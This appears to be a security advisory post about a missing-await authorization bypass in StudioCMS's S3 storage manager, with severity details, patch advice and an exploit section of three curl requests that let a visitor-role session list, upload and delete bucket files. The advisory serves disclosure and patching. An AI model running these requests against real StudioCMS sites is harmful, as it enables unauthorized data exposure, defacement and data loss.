Listen to this Post
The vulnerability exists because the `isAuthorized()` function in the S3 storage manager is declared async, meaning it returns a Promise<boolean>. However, in both the POST and PUT request handlers, this function is called without the `await` keyword. In JavaScript, a `Promise` object is always truthy. Therefore, the check `!isAuthorized(type)` always evaluates to `false` (because `!truthy` is false), causing the authorization check to be completely bypassed. An authenticated user with the lowest “visitor” role can then perform privileged actions like uploading, deleting, or listing all files in the S3 bucket .
DailyCVE Form:
Platform: StudioCMS
Version: <0.3.1
Vulnerability: Missing await
Severity: High (7.6)
Date: 2026-03-11
Prediction: Patched in 0.3.1
What Undercode Say:
Analytics:
- CWE-863 (Incorrect Authorization) .
- CVSS: 7.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L) .
- Attack Vector: Network, Low Complexity.
- Privileges Required: Low (Authenticated Visitor).
- Impact: Data breach and potential data loss.
Exploit:
1. List all files as a visitor (should require editor+)
curl -X POST 'http://localhost:4321/studiocms_api/integrations/storage/manager' \
-H 'Cookie: studiocms-session=<visitor-session-token>' \
-H 'Content-Type: application/json' \
-d '{"action":"list","prefix":""}'
2. Upload a malicious file as a visitor
curl -X PUT 'http://localhost:4321/studiocms_api/integrations/storage/manager' \
-H 'Cookie: studiocms-session=<visitor-session-token>' \
-H 'Content-Type: application/octet-stream' \
-H 'x-storage-key: malicious/payload.html' \
--data-binary '
<h1>Uploaded by visitor</h1>
'
3. Delete a file as a visitor
curl -X POST 'http://localhost:4321/studiocms_api/integrations/storage/manager' \
-H 'Cookie: studiocms-session=<visitor-session-token>' \
-H 'Content-Type: application/json' \
-d '{"action":"delete","key":"important/document.pdf"}'
Protection from this CVE:
- Upgrade to StudioCMS version `0.3.1` or later.
- If unable to patch immediately, manually add the `await` keyword to the `isAuthorized()` calls in the source code at lines 200 and 372 of
packages/@studiocms/s3-storage/src/s3-storage-manager.ts.// Before (vulnerable): if (!isAuthorized(type)) { ... } // After (patched): if (!(await isAuthorized(type))) { ... }
Impact:
- Any authenticated user with the “visitor” role can perform all S3 storage management actions (list, upload, delete, rename).
- An attacker can list all files and generate presigned download URLs, exposing all stored content.
- Attackers can delete arbitrary files, causing permanent data loss.
- Malicious files can be uploaded or existing files renamed to replace legitimate content, leading to potential defacement or supply-chain attacks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

